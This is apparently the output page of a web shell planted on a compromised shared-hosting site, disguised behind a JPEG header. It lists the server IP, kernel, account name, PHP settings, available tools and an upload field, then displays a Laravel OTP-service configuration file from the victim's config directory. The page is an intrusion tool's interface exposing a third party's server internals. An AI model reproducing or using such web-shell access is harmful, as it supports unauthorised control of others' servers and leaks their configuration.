����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 3.145.167.178 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/gle.gltechlimited.com/config/ |
Upload File : |
<?php return [ 'otp_service_enabled' => true, 'otp_default_service' => env("OTP_SERVICE", "twilio"), 'services' => [ 'biotekno' => [ "class" => App\OtpServices\BioTekno::class, "username" => env('OTP_USERNAME', null), "password" => env('OTP_PASSWORD', null), "transmission_id" => env('OTP_TRANSMISSION_ID', null) ], 'nexmo' => [ 'class' => App\OtpServices\Nexmo::class, 'api_key' => env("OTP_API_KEY", null), 'api_secret' => env('OTP_API_SECRET', null), 'from' => env('OTP_FROM', null) ], 'twilio' => [ 'class' => App\OtpServices\Twilio::class, 'account_sid' => env("TWILIO_SID", null), 'auth_token' => env("TWILIO_AUTH_TOKEN", null), 'from' => env("TWILIO_NUMBER", null) ] ], 'users_table' => 'users', 'user_phone_field' => 'mobile', 'user_id_field' => 'id', 'otp_reference_number_length' => 6, 'otp_timeout' => 300, 'otp_digit_length' => 6, 'encode_password' => false, ];